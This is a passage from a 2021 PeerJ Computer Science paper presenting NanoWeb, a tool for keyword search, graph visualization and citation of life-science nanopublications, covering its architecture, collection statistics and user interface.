the assertion graph; (C) network of gene-disease associations created by five nanopublications. Full-size DOI: 10.7717/peerj-cs.335/fig-1 Giachelle et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.335 3/35 http://dx.doi.org/10.7717/peerj-cs.335/fig-1 http://dx.doi.org/10.7717/peerj-cs.335 https://peerj.com/computer-science/ the nanopublication relation network could lead to finding related concepts and assertions that might not be explicitly connected in the scientific literature and databases. Nonetheless, despite these premises, nanopublications are not widely used by scientists outside specific circles (Page, 2018); they are hard to find and rarely cited. Nanopublications rarely have a human-readable accessible version and cannot be searched via keywords or natural language queries. Although nanopublications are based on LOD principles, there are still no tools that allow the user to explore their connections intuitively and discover if and how one assertion is related to others, as we have done in the example above. Leveraging on the famous data is the new oil metaphor (The Economist, 2017), we can say that with nanopublications we have a vast oil reservoir but no active refinery, distribution net and machines to put it into use. In this work, we target these issues and present the NanoWeb application (https://w3id. org/nanoweb/), an open-source and publicly available web service enabling intuitive search, exploration, and re-use of nanopublications. The current version of NanoWeb is tailored for the life science domain, and it is designed to help experts of this domain in their research work. NanoWeb is an extensible tool to be applied to other scientific domains, even though certain customization to do so will be required. NanoWeb is a single entry point to the world of nanopublications enabling the seamless integration of data search, exploration, and re-use services; its central features are: 1. A crawler gathering publicly available nanopublications from the web; 2. Two intuitive search functionalities, based respectively on the keyword search and boolean search paradigms; 3. A user-oriented visual interface to consult the nanopublications enriched with information gathered from external authoritative ontologies; 4. A service enabling the graph-based visualization of assertions and the exploration of their relation network; 5. Data search functionalities providing entry points to external curated databases storing the scientific facts encoded by the nanopublications as well as to the scientific papers where the assertions were extracted. The rest of the article is organized as follows: “Background” presents the background of the nanopublication model and the state of the art of systems based on it. “The NanoWeb Architecture” describes the overall architecture of the NanoWeb application. “Nanopublication Collection Statistics” reports the statistics about the nanopublications available in NanoWeb. “NanoWeb Graphical User Interface” shows how NanoWeb works and details the functioning of the user interface. “Expert Users Survey” reports the results of the expert users survey conducted on NanoWeb. “Discussion on Maintaining Aspects” discusses the challenges to be faced with maintaining NanoWeb in the medium-long period and how it can scale up to be used in domain others than life science. Finally, “Conclusions” draws some final remarks and outlines future work. Giachelle et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.335 4/35 https://w3id.org/nanoweb/ https://w3id.org/nanoweb/ http://dx.doi.org/10.7717/peerj-cs.335 https://peerj.com/computer-science/ BACKGROUND Basics of nanopublications Nanopublications rely on Semantic Web technology. In particular, they are modeled via RDF (Groth, Gibson & Velterop, 2010), a widely used standard endorsed by the W3C consortium (https://www.w3.org/TR/rdf11-primer), adopted for data publishing, accessing and sharing. RDF allows for the manipulation, enrichment, discovery and interoperability of data and it is at the core of the implementation of the LOD paradigm (Pound, Mika & Zaragoza, 2010). RDF is based on the concept of statement, that presents a triple-based structure. Within a triple, subject, predicate and object are resources. In particular, an RDF dataset can be represented as a graph where, given a triple, the subject and the object are the nodes representing resources, while the predicate, the direct edge connecting the two, expresses their relationship. RDF resources can either be Internationalized Resource Identifiers (IRIs), literals or blank nodes. An IRI (https://tools.ietf.org/html/rfc3987) is a more general form of URI which can also contain Unicode characters. A literal is a value which can be associated to a specific type of value, such as string, integer, date, time etc. The default value is string. Blank nodes are resources which are labeled with a URI-like string which has validity only inside the database. In RDF every resource and relationship is labeled. subject and object nodes can be labeled with IRIs, object nodes can also be labeled with literals. Relationships can only be labeled with IRIs. Blank nodes can be subject or object of a triple. A set of RDF triples can also be thought as a directed graph, where subjects and objects are nodes and predicates are the directed edges. Hence, it is also called RDF graph. In recent years it has been proposed the idea to extend the basic semantic of RDF by using quads instead of triples, where an identifier (an IRI) is added. In this way, groups of triples may be characterized as belonging to the same subgraph, that is, to the same named graph (Carroll & Stickler, 2004; Carroll et al., 2005), if they share the same extra URI. Every nanopublication is made of four basic named graphs as shown in Figure 1.a: 1. Head: the graph composed of four triples connecting assertion, provenance and publication info graphs together and specifying that the graph at hand is a nanopublication. 2. Assertion: the assertion is to be thought of as the minimal unit of thought, a fact or a statement. It can be composed of one or more RDF triples and for this reason, we often call it assertion graph. 3. Provenance: the named graph made of metadata providing context about the assertion. The information contained in the provenance describes how the information expressed in the assertion was created (from some experiment, extrapolate from a paper or article, etc.) and the methods that were used to generate the assertion. It includes information such as authors, institutions, time-stamps, grants, links to evidence papers and other resources. Giachelle et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.335 5/35 https://www.w3.org/TR/rdf11-primer https://tools.ietf.org/html/rfc3987 http://dx.doi.org/10.7717/peerj-cs.335 https://peerj.com/computer-science/ 4. Publication information: the graph containing the information about the nanopublication itself, such as its authors, the topic of the assertion, and rights information. Nanopublication resources and datasets The website http://nanopub.org/ is the most comprehensive access point to the world of nanopublications. It collects papers and tools about nanopublications. The central resource to access millions of publicly available nanopublications is the “nanomonitor” (http://app. tkuhn.eculture.labs.vu.nl/nanopub-monitor/). It provides a list of sixteen worldwide distributed servers where nanopublications can be openly accessed and downloaded in several formats. The nanopublications are ordered by identifier, but no full-text or structured search service is available. The nanopublications are accessible in an RDF serialization format. Thus they are machine-readable but not human-readable (see Fig. 1A). Kuhn et al. (2013) describes a Web-based service (i.e., nanobrowser) enabling access to human-readable enriched scientific statements extracted from nanopublications. The aim of nanobrowser is to enable easy publishing and curation of nanopublications, but unfortunately, at the time of writing, it does not work, even though the source code is publicly available (https://github.com/tkuhn/nanobrowser). The nanobrowser had the goal to ease the extraction of facts from scientific papers and to enable the community to curate and revise the statements; its overall objective is different from those of NanoWeb even though they share the requirement of making nanopublications human-readable and facilitate access to them. In the same direction, the whyis project (http://tetherless-world. github.io/whyis/) proposes a knowledge graph infrastructure to support domain-aware management and curation of knowledge from different sources; it leverages on the nanopublication model to represent the facts and handle their provenance in the knowledge base. Whyis also offers some facilities to allow the users to visually explore the knowledge graph beyond a given entity by using the so-called knowledge explorer (McCusker et al., 2017; McCusker et al., 2018); the knowledge explorer shares some similarities with the NanoWeb exploration tool. In particular, they both allow the exploration of the connections between entities in the knowledge graph. Nevertheless, whyis does not visualize the scientific assertions encoded by nanopublications. More specifically, the whyis project is oriented to the creation and user-based curation of the nanopublications rather than to the search and exploration possibilities connected to them. Hence, NanoWeb is a complementary service rather than a competitor to whyis. Mons et al. (2011) advocated for the systematic use of nanopublications to encode scientific facts reported in published papers. They see nanopublications as the key tool to enable reasoning and fact discovery exploiting machine intelligence. Furthermore, they extracted thousands of nanopublications about valuable and hard to discover gene variations and made them publicly available. We enable the search and access to these nanopublications in NanoWeb. Chichester et al. (2015) described how they created nanopublications encoding scientific facts associated with more than 38K proteins stored in the neXtProt Giachelle et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.335 6/35 http://nanopub.org/ http://app.tkuhn.eculture.labs.vu.nl/nanopub-monitor/ http://app.tkuhn.eculture.labs.vu.nl/nanopub-monitor/ https://github.com/tkuhn/nanobrowser http://tetherless-world.github.io/whyis/ http://tetherless-world.github.io/whyis/ http://dx.doi.org/10.7717/peerj-cs.335 https://peerj.com/computer-science/ database (https://www.nextprot.org/). The main motivation for this work is to exploit nanopublications potential to support end-user research on human proteins enabling machine-reasoning, easy search and access to the protein-related facts. Chichester et al. (2014) showed how nanopublications as fine-grained annotations answer to complex knowledge discovery queries otherwise challenging to deal with. Also, in this case, queries are performed using the SPARQL structured language confining the use of nanopublications to technical database experts. We crawled and enable keyword-based search over all the publicly available neXtProt nanopublications. Queralt-Rosinach et al. (2016) described the process that led to the publication of millions of nanopublications about the pathophysiology of diseases extracted from the scientific literature and backed by curated records in the DisGeNET database (http://rdf. disgenet.org/). The DisGeNET nanopublications are publicly available and accessible via a SPARQL endpoint. NanoWeb collected, indexed all the available DisGeNET nanopublications and made them searchable and human-readable. Each nanopublication is enriched with a URL linking to the related curated record in DisGeNET. Wikipathways is an online collaborative pathway resource that is made available as RDF and nanopublications (Waagmeester et al., 2016). The nanopublications are backed by the Wikipathways curated database and are accessible via a SPARQL endpoint (not available at the time of writing). The resource to convert the RDF triples of Wikipathways to nanopublication is publicly available (https://github.com/wikipathways/ nanopublications). We crawled all the Wikipathways nanopublications, that are now searchable and accessible via NanoWeb. Hettne et al. (2016) extracted more than 200M assertions about gene-disease associations from the biomedical literature. 7M assertions are explicitly stated in the scientific papers and the rest is implicitly inferred. There is a publicly available dump (https://datadryad.org/stash/dataset/doi:10.5061/dryad.gn219) of the nanopublications shared as additional data for the article. The research group (https://biosemantics. erasmusmc.nl/) was responsible for the website “https://rdf.biosemantics.org/” (now inactive) sharing all the nanopublications and the ontology required to dereference the concepts encoding the assertions. Unfortunately, at the time of writing, the nanopublications as well as the SPARQL endpoints to access them are unavailable. Amith & Tao (2018) defined an ontology—VAXMO—for encoding vaccines-related information extracted from scientific literature and used nanopublications to propose a method to store misconceptions about vaccines. Unfortunately, the VAXMO ontology is not accessible as well as the associated nanopublications. Also, Zhang et al. (2019) recently used the nanopublication model to represent scientific facts manually extracted from the literature about cancer behavioral risk factors. They presented a prototype— AERO—to search and visualize the nanopublications; search is based on SPARQL queries and the visualization is allowed only for the results returned by the SPARQL endpoint. At the time of writing, AERO is not publicly available. To the best of our knowledge, there is no available tool to visualize nanopublications and explore their connections. The tool which is closer to NanoWeb in terms of semantic search and graph visualization is BioKB (Biryukov et al., 2018). BioKB provides access Giachelle et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.335 7/35 https://www.nextprot.org/ http://rdf.disgenet.org/ http://rdf.disgenet.org/ https://github.com/wikipathways/nanopublications https://github.com/wikipathways/nanopublications https://datadryad.org/stash/dataset/doi:10.5061/dryad.gn219 https://biosemantics.erasmusmc.nl/ https://biosemantics.erasmusmc.nl/ http://dx.doi.org/10.7717/peerj-cs.335 https://peerj.com/computer-science/ to the semantic content of biomedical articles through a SPARQL endpoint and a web interface; its goal is to allow the users to search for biomedical entities and visualize their graph of relations. However, BioKB does not account for nanopublications and does not support a multi-level exploration of the graph, enabling an in-depth exploration of the entities relation network. Overall, the current services for searching nanopublications are all based on sparse SPARQL endpoints. To this end, NanoWeb contributes on two levels. First, it provides a unique online access point to all the publicly available nanopublications from the Life Science domain; and, second, NanoWeb provides advanced services such as keyword search, visualization and human-readable access to millions of nanopublications, making them accessible to users without technical expertise in SPARQL and related technologies. Search over RDF RDF graphs can be interrogated through the powerful but complex SPARQL query language (Pérez, Arenas & Gutierrez, 2009). SPARQL is not intuitive for end-users since it presents a complex syntax, far from a natural expression of their information need (Wu, 2013). It also requires knowledge of the underlying schema of the database, and of the IRIs used in it. This knowledge is often not possessed by the average end-user. A search paradigm adopted to address the issues related to the use of SPARQL is keyword search. Keyword-based methods have gained importance over time both in research and in industry as a paradigm to facilitate the access to structured data (Bast, Buchhold & Haussmann, 2016; Kopliku, Pinel-Sauvagnat & Boughanem, 2014; Yu, Qin & Chang, 2010). The main difference between SPARQL and keyword search is that, while SPARQL returns the one and only correct answer (or an empty set if there was no answer), keyword search returns a ranking of answers, ordered based on their relevance to the information need expressed by the user via the keyword query. In the literature, keyword query search systems over structured data are mainly focused on relational databases (RDB) (Yu, Qin & Chang, 2010) but many are also emerging for graph-like databases such as RDF datasets (Wang & Aggarwal, 2010; Bast, Buchhold & Haussmann, 2016). These systems may be divided into three categories. The first kind of systems is schema-based. Examples are (Balmin et al., 2003; Agrawal, Chaudhuri & Das, 2002; Luo et al., 2011). These systems exploit the schema information of the database, be it relational or RDF, to formulate queries in a structured language (SQL or SPARQL depending on the type of the database) designed from the keyword query of the user. The second category is graph-based. Originally born with relational databases (Bhalotia et al., 2002; Simitsis, Koutrika & Ioannidis, 2008), the technique at the base of these systems was based on the transformation of the relational database in a graph. These systems are relatively easily translated in the RDF scenario since these databases are already in a graph form. A core challenge of these systems is to deal with the size of big graphs, which can contain tens of millions of nodes, if not more. In several cases, it has been shown that the size makes the task unsolvable by these systems (Coffman & Weaver, 2014). Giachelle et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.335 8/35 http://dx.doi.org/10.7717/peerj-cs.335 https://peerj.com/computer-science/ Stemming from this last class of systems, the last category is the one of the virtual- document based systems Kadilierakis et al. (2020). First described in Lopez-Veyna, Sosa & López-Arévalo (2012), this approach relies on the concept of virtual document of a graph. Given one graph, RDF or obtained by relational tuples, its corresponding virtual document is obtained by extracting words from it in an automatic way. This produces a “flat” representation of the graph, where its syntax and topology are lost but its semantic and lexical content is somewhat maintained. The virtual document representation is convenient since systems can leverage on efficient state-of-the-art IR methods for indexing and ranking. These methods operate by first extracting subgraphs from the whole database, then converting them in their virtual document representation and ranking these documents with respect to the keyword query. The user receives at the end the ranking of graphs in the order dictated by the ranking on the corresponding documents. There is no keyword search system for nanopublications, which are always searched via SPARQL endpoints. The complexity of search systems for RDF and their scalability issues have prevented the use of keyword search for RDF data in general and nanopublications in particular. NanoWeb, exploits a very recent advancement in virtual-document based systems (Dosso & Silvello, 2020), which enable fast and effective keyword search over RDF and nanopublications. THE NANOWEB ARCHITECTURE The NanoWeb architecture is composed of four main components: (i) a crawler that gathers nanopublications from the Web; (ii) a search system that indexes and enables full- text search over the nanopublications; (iii) a nanopublication citation system; (iv) a Web user interface to search, access and explore the nanopublications and their relation network. Figure 2 shows the architecture of the NanoWeb system, which consists of the following areas: � Data creation and update (Fig. 2A): —Crawler (1): it collects nanopublications from different web sources. It considers different types of resources: authoritative ones, such as academic or institutional platforms; and public ones, such as git repositories. Nanopublications are downloaded and stored in an RDF database (2). The crawler also downloads new nanopublications obtained from URLs that can be provided by the users; this process is handled by the business logic unit (11). The crawler sends a new request for each web source in the list of initial seeds. It parses and scrapes the web pages and produces a list of extracted URLs. Each URL in the list is processed so that direct links to nanopublications are resolved and added to the download queue. Each nanopublication file is downloaded using an independent thread so that requests are handled asynchronously. These files are saved into the RDF database. The links in the URL list that point to other web pages are followed so that these new Web pages are also parsed and scraped in a recursive scraping loop to discover new nanopublications. The crawler is written in Java and it comes with a graphical and a batch mode. The graphical mode allows the user to interact and control crawler Giachelle et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.335 9/35 http://dx.doi.org/10.7717/peerj-cs.335 https://peerj.com/computer-science/ activities using a Graphic User Interface (GUI).1 The batch mode enables a fast and batch-based download using operating systems lacking a GUI. —Metadata builder (3): the nanopublications are processed to dereference the URLs and to get additional metadata; for instance, the nanopublications are enriched with the label of the concepts referring to external ontologies, the names of creators and curators and the title of the evidence papers. These data are saved in a relational database (4).2 —Document builder (5): The document creation phase occurs after the dereferencing and enrichment phase. The document builder creates “virtual” nanopublication documents, which are saved into a database (6), on which the keyword search system is based. � Search system (Fig. 2B): this system performs keyword search on the nanopublications and it has three components: —Business logic (11): it is the controller unit of the search system. It performs the orchestration activities such as the coordination of the crawler by feeding it with new nanopublication URLs. It takes the user keyword query as input and returns the relevant nanopublications through the Web interface as output. To perform this task, the business logic unit relies on three databases: the nanopublication documents database (6), the fields (7) and the indexes (8). The indexes database contains the inverted index extracted from the nanopublication documents required to match the query terms with the document terms. The fields database is required to provide fast access to specific nanopublication data such as the authors, curators, and evidence paper metadata. —Web interface (12): it is the front-end allowing the user to search, access, explore and cite nanopublications through an interactive interface. It communicates with the business logic unit using a REST layer that provides public API for accessing nanopublications data in JSON format. —Log system (13): it deals with the logging tasks of the search system and it relies on a specific relational database (9). It communicates with the Web interface to collect relevant user activity information and possible problems. � Citation system (10): it generates the citations text snippet for the nanopublications of interest to the user by relying on the system presented by Fabris, Kuhn & Silvello (2019). Citations are a fundamental tool to give credit to authors and curators of data and publications and help other users to recognize the value of nanopublications. When the business logic unit (11) receives the request to produce a citation for a nanopublication, it sends this request to the citation system, that in turn collects the necessary metadata from the corresponding database (4). Once produced, the citation snippet is returned to the business logic unit and then visualized in the Web interface. Search system Let us assume that a user has an information need, and wants to retrieve the nanopublications that satisfy it. Since nanopublications are encoded in RDF, one 1 A demonstration video of the crawler in action, using the graphic mode, is avail- able at https://bit.ly/2RVlGzl. 2 All the relational databases are based on PostgreSQL version 10.6 allowing for the table partitioning function; this function enables efficient storage and access to the data. Giachelle et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.335 10/35 https://bit.ly/2RVlGzl http://dx.doi.org/10.7717/peerj-cs.335 https://peerj.com/computer-science/ possibility is to query the graph composed by all the nanopublications via the SPARQL query language, that, as already discusses, presents drawbacks for non-expert users. We adopt two alternatives to SPARQL, that is, keyword search and boolean search, both oriented to ease the search process for the users. Boolean search (i.e., advanced search) is adopted for domain-specific searches and it is useful to guide users in query formulation, since they often do not know in advance what they can search. We realized advanced search over the nanopublication metadata database, that allows for searching on specific fields of the indexed data (e.g., genes, diseases, proteins or authors). Boolean search enables targeted search functionalities, but it does not allow for general and open full-text search over the nanopublications. To allow users to exploit natural language to search for nanopublications, we realized a keyword search system over RDF data. The system we adopt is based on the virtual document strategy, first presented in Lopez- Veyna, Sosa & López-Arévalo (2012) and used in many other papers about keyword search on RDF graphs (Dosso & Silvello, 2020; Elbassuoni & Blanco, 2011; Mass & Sagiv, 2016). The underlying task of these papers is that, given an RDF graph, the user wants to query it, but for some reason, she is unable to use a SPARQL query. Keyword search is an alternative paradigm to using a structured query based on a query made of keywords. Figure 2 NanoWeb system architecture. (A) Data creation and update area; (B) Search system; (C) Supporting databases. Full-size DOI: 10.7717/peerj-cs.335/fig-2 Giachelle et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.335 11/35 http://dx.doi.org/10.7717/peerj-cs.335/fig-2 http://dx.doi.org/10.7717/peerj-cs.335 https://peerj.com/computer-science/ The virtual document strategy is one of the many strategies deployed to face keyword search on RDF graphs. Given an RDF graph, we call its corresponding virtual document the textual document obtained from the concatenation of words obtained from the IRIs and Literals contained in the nodes and edges of the graph. Given a collection of graphs it is therefore possible to create a corresponding collection of virtual documents. Every document is uniquely linked to the graph that generated it since they share the same identifier. Then, the collection of documents is indexed and, from that moment on, this index can be used to answer keyword queries in the same way in which it is done in more classic IR scenarios, where the collections are made by “real” documents. In this paper we used a probabilistic model (i.e., BM25 (Robertson et al., 1994)) as ranking function. Every time a new query is issued, BM25 uses the virtual document index to create a ranking of documents. The document identifiers are used to retrieve the corresponding graphs, that is, the corresponding nanopublications, from the collection. This list of nanopublications is then returned to the final user in the same order dictated by the ranking. One may argue that this strategy discards information from the graphs. Since each graph is flattened to a document version of itself, information such as its topology and the disposition of words among nodes and edges is lost. This is certainly true, and in fact works such as (Dosso & Silvello, 2020; Elbassuoni & Blanco, 2011; Mass & Sagiv, 2016) do not limit themselves to virtual documents, but employ different kinds of heuristics to better leverage on the topology of the graphs. Moreover, topology oriented heuristics often rely on the exploration of the graphs, which adds overhead to the whole computation. The more the answers returned by BM25, the bigger this overhead. Therefore, we argue that the use of topology-oriented heuristics do not guarantee a significant improvement on the effectiveness of the rankings obtained by the graphs with respect to the added overhead to the computation. NANOPUBLICATION COLLECTION STATISTICS In Table 1 we report the number of nanopublications per scientific platform currently available in NanoWeb. Currently, we have crawled and indexed nanopublications from the following platforms: � DisGeNET: (https://www.disgenet.org/) “a discovery platform containing one of the largest publicly available collections of genes and variants associated to human diseases” Table 1 Number of nanopublications per platform. Platform Number of nanopublication DisGeNET 4,717,256 NeXtProt 4,014,376 Protein Atlas 1,254,466 Wikipathways 26,934 Total number of nanopublications 10,013,032 Giachelle et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.335 12/35 https://www.disgenet.org/ http://dx.doi.org/10.7717/peerj-cs.335 https://peerj.com/computer-science/ (Piñero et al., 2019). DisGeNET is a knowledge management platform integrating and standardizing data about disease-associated genes and variants from multiple sources, including the scientific literature. DisGeNET covers the full spectrum of human diseases as well as normal and abnormal traits. Queralt-Rosinach et al. (2016) presented the publication of DisGeNET human Gene-Disease Associations (GDAs) as a new Linked Dataset exploiting the nanopublication approach. DisGeNET provides roughly half of the nanopublications, about 5 million, available in NanoWeb. � NeXtProt: (https://www.nextprot.org/) “neXtProt is a protein knowledge platform that aims to support end-user research on human proteins” (Chichester et al., 2015). Chichester et al. (2015) converted data from neXtProt into nanopublications to show how they can be used to seamlessly query the data and gain biological insight. In particular, they converted three types of annotations of interest for the biomedical community: variation data, posttranslational modification (PTM), and tissue expression. � Protein Atlas: (https://www.proteinatlas.org/) “A Human Pathology Atlas has been created as part of the Human Protein Atlas program to explore the prognostic role of each protein-coding gene in each cancer type by means of transcriptomics and antibody-based profiling” (Uhlen et al., 2017). The Human Protein Atlas is an open- access knowledge-base providing the data to allow genome-wide exploration of the impact of individual proteins on clinical outcomes. The Human Protein Atlas (HPA) programme aims to “generate a comprehensive atlas of protein expression patterns in human normal and cancer tissues as well as cell lines” (Pontén, Jirström & Uhlen, 2008). � WikiPathways: (https://www.wikipathways.org/) “WikiPathways is an open, collaborative platform dedicated to the curation of biological pathways” (Slenter et al., 2017; Waagmeester et al., 2016). WikiPathways provides rich pathway databases with a focus on genes, proteins and metabolites. The data from WikiPathways have been converted into a dataset of nanopublications as explained in Kuhn et al. (2017). Association analysis DisGeNET accounts for roughly half the total number of nanopublications in NanoWeb. The assertions encoded by these nanopublications are divided into gene-disease associations of different types. In Fig. 3, we report the number of assertions in NanoWeb for each association of the DisGeNET ontology. A detailed description of the associations is available in the DisGeNET website (https://www.disgenet.org/dbinfo#section5). In the same vein, Table 2 reports the genes-tissues association types present in NeXtProt nanopublications. In particular, the protein-coding gene expression in tissue association describes the relationship between a protein-coding gene in directing the production of proteins expressed in a tissue. Another type of association regarding proteins is the protein expression in tissue which describes the expression level (high, low, medium, not detected) of a protein in a tissue. Besides, the sequence on amino-acid association describes the relationship between proteins and amino acids. The total number of nanopublication assertions regarding protein associations is over 5 million. Giachelle et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.335 13/35 https://www.nextprot.org/ https://www.proteinatlas.org/ https://www.wikipathways.org/ https://www.disgenet.org/dbinfo#section5 http://dx.doi.org/10.7717/peerj-cs.335 https://peerj.com/computer-science/ Scientific evidences Nanopublication assertions are supported by evidences; an evidence can be a scientific publication, a curated database record or both. The nanopublication evidences in NanoWeb come from several institutional open-access databases such as Bgee (https://bgee.org/), Cancer Sanger (https://cancer.sanger.ac.uk/), EbiQuickGo (https://www.ebi.ac.uk/QuickGO/), Gene Expression Omnibus (GEO) (https://www.ncbi.nlm.nih.gov/geo/), Protein Atlas (https://www.proteinatlas.org/) and UniProt (https://www.uniprot.org/). We report the evidence databases associated to the nanopublications available in NanoWeb in Table 3. The total number of evidences collected from authoritative databases are about 11 million, and the evidences coming from publications are more than 6 million. All these publications are available in the PubMed (https://pubmed.ncbi.nlm.nih.gov/) database. NANOWEB GRAPHICAL USER INTERFACE The NanoWeb system, available at http://w3id.org/nanoweb/, provides an interactive Web interface that the user can use to search, access, explore, and cite nanopublications. A demo video presenting NanoWeb functionalities is available at https://bit.ly/NWURL2. Association Gene Disease Association Therapeutic Biomarker Chromosomal Rearrangement Susceptibility Mutation Somatic Causal Mutation Genomic Alterations Genetic Variation Causal Mutation Germline Causal Mutation Altered Expression Post-translational Modification Fusion Gene Modifying Mutation Somatic Modifying Mutation Germline Modifying Mutation is-a is-a is-a is-a is-a is-a SIO_000897 4,717,256 is-a 13,668 4,688,292 1,034,209 337,705 3,875 290 300 990 224 7,959 31 77 SIO_000983 SIO_001120 SIO_001121 SIO_001350 SIO_001123 SIO_001124 SIO_001349 SIO_001348SIO_001122 SIO_001343 SIO_001342SIO_001119 SIO_001345 SIO_001344 SIO_001346 SIO_001347 12,880 354 1,033,619 Figure 3 DisGeNET ontology: number of assertions (yellow) for each DisGeNET association type. Full-size DOI: 10.7717/peerj-cs.335/fig-3 Giachelle et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.335 14/35 https://bgee.org/ https://cancer.sanger.ac.uk/ https://www.ebi.ac.uk/QuickGO/ https://www.ncbi.nlm.nih.gov/geo/ https://www.proteinatlas.org/ https://www.uniprot.org/ https://pubmed.ncbi.nlm.nih.gov/ http://w3id.org/nanoweb/ https://bit.ly/NWURL2 http://dx.doi.org/10.7717/peerj-cs.335/fig-3 http://dx.doi.org/10.7717/peerj-cs.335 https://peerj.com/computer-science/ Figure 4 shows the NanoWeb search interface. At the top of the page, there is the query input form (1), where the user types the query and searches for nanopublications. There is a button (2) to pin or unpin the query input form on the right side of the query input form. The query input form is unpinned by default; this means that it floats at the top of the page so that it is always visible to the user even when the page is scrolled. The user can press the button to pin the query input form, making it hidden when the page is scrolled. On the left side of the query input form, there is the menu button (3). By clicking on it, the sidebar appears with a list of links to the web app functionalities: 1. Home: takes the user to the home page. 2. Stats: takes the user to the Web page summarizing the NanoWeb system statistics, such as the number of nanopublications and triples inserted in the database. Table 2 Assertion numbers for association types: “protein-coding gene expression in tissue” and “protein expression in tissue”. Association Number of assertion Protein-coding gene expression in tissue (generic) 6 Protein-coding gene expression in tissue with quality high 124,261 Protein-coding gene expression in tissue with quality low 184,615 Protein-coding gene expression in tissue with quality medium 275,241 Protein-coding gene expression in tissue with quality negative 837,144 Protein-coding gene expression in tissue with quality not detected 341,062 Protein-coding gene expression in tissue with quality positive 1,421,203 Protein-coding gene expression in tissue (total) 3,183,532 Protein expression in tissue with level high 150,366 Protein expression in tissue with level low 241,325 Protein expression in tissue with level medium 361,641 Protein expression in tissue with level not detected 501,133 protein expression in tissue (total) 1,254,466 Sequence on amino-acid 739,528 Protein associations (total) 5,177,526 Table 3 Number of evidences per database. Database Number of evidences Bgee 5,576,047 Cancer sanger 578 EbiQuickGo 8,876 Gene expression omnibus (GEO) 573,648 Protein atlas 4,125,154 UniProt 628,749 Total number of evidences 10,913,052 Giachelle et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.335 15/35 http://dx.doi.org/10.7717/peerj-cs.335 https://peerj.com/computer-science/ 3. About: takes the user to the page that briefly describes the purpose of the NanoWeb system and summarizes the provided functionalities. 4. Contacts: leads to a page with contact information of the authors of this project. The body of the Web interface consists of three layers displayed alternatively: � Nanopublications list (Fig. 4A) A list of nanopublications retrieved for the user query. Each nanopublication is represented with a row in the list, reporting the following information: 1. The title of the nanopublication (4a). 2. The assertion of the nanopublication (4b). 3. A link to the source platform of the data (4c). For instance, in Fig. 4 the source platform of the data is DisGeNET. 4. The graph button to display the graph associated with the nanopublication (4d). When the user clicks this button, the Graph layer appears to show the nanopublication graph on the right side of the nanopublications list. If the Information layer is displayed, it is replaced with the Graph layer. The Load More button (Fig. 4.5) loads more relevant nanopublications associated with the query, if any. As we can see in Fig. 5, when a user clicks on a specific row, the Information layer is displayed, showing the information regarding the selected nanopublication. � The information layer shows information associated with a selected nanopublication, including: 1. Assertion: (Fig. 5.1) This section reports the assertion of the nanopublication of interest and its title. Besides, meaningful entities, such as the disease Colorectal Carcinoma, are reported as links to external knowledge bases. 2. Publication info: (Fig. 5.2) This section reports the publication information of the clicked nanopublication. This information includes the creation date, the creators, and the source platform. Moreover, a link to the data record is provided so that the user can be redirected to the data record about the assertion; these links act as entry points to external scientific databases. For instance, Fig. 6 shows the data record web page for the nanopublication with title: mutL homolog 1—Colorectal Carcinoma in DisGeNET. 3. Provenance: (Fig. 5.3) This section shows the provenance information such as the evidence source and how the nanopublication was generated. It also reports the abstract of the publication, if present. 4. Cite: (Fig. 5.4) This section shows the citation snippet of the nanopublication. The user can copy the citation text by clicking on the Cite this nanopub button in the header. Giachelle et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.335 16/35 http://dx.doi.org/10.7717/peerj-cs.335 https://peerj.com/computer-science/ The user can expand/collapse each section by clicking on the title or in the header section. � Graph layer: Fig. 7 shows the Graph layer displayed on the right side of the nanopublications list after the user click. This layer shows the graph associated with the nanopublication, leveraging on the RDF triple structure. Each graph node corresponds to the subject or the object of an assertion, while the edge represents the predicate. Each assertion is represented with a directed edge. The figure shows the graph associated with the mutL homolog 1—Colorectal Carcinoma nanopublication. The assertion within this nanopublication has two nodes: mutL homolog 1 as the subject and Colorectal Carcinoma as the object. The subject—a gene—is colored in green, while the object—a disease—is in red. The predicate connecting the two is represented as an oriented grey edge. There are different ways to interact with the nanopublication graph. For instance, the user can click on a node to expand the relation network and visualize other nodes connected to the nanopublication of interest. The complete list of the user graphic controls available can be consulted by clicking on the Controls help button indicated with number three in Fig. 7. The figure shows a two-levels expansion starting from the subject node mutL homolog 1 and ending with the expansion of the node associated to the Colorectal Cancer disease. The possible actions that a user can perform on the graph are: —Expand/collapse graph network: When the user left-clicks on an unexpanded node, the graph is expanded. Thus its relation network is shown. Otherwise, if the user clicks on an already expanded node, the graph collapses, and in turn, its relation network is hidden. —Show node information: When the user right-clicks on a node, a dialog modal window appears to show the information concerning that node. For instance, the information window shows the type of entity node clicked, such as gene or disease in case of nodes coming from nanopublications concerning biological or medical fields. —Show edge information: When the user left-clicks on edge, a dialog modal window appears to show the information regarding the nanopublication. Figure 8 shows that when the edge connecting mutS homolog 6 and Carcinogenesis is clicked, the nanopublication information window appears on the right side. The modal dialog window contains the same information of the Information layer. Still, it has a smaller width and can be dragged anywhere inside the Graph layer, so it is always accessible without covering it. —Drag and drop: The user can drag and move the nanopublication graph by pressing the mouse’s left button and moving it around the graph layer. When the desired position has been chosen, the user can release the left button of the mouse to drop the graph. Giachelle et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.335 17/35 http://dx.doi.org/10.7717/peerj-cs.335 https://peerj.com/computer-science/ —Zoom in/out: Using the mouse wheel, the user can zoom in or out on the nanopublication graph. —Switch between Graph and Information layers: A button is provided to switch between Graph and Information layers. For instance, when the Graph layer is displayed to go back to the Information layer, the user can click on the Show Nanopub Info button (Fig. 7.1). In the same way, when the Information layer is displayed, the user can switch to the Graph layer by clicking the Show Graph Layer button. —Rearrange layers: The Navbar menu manages layers disposition 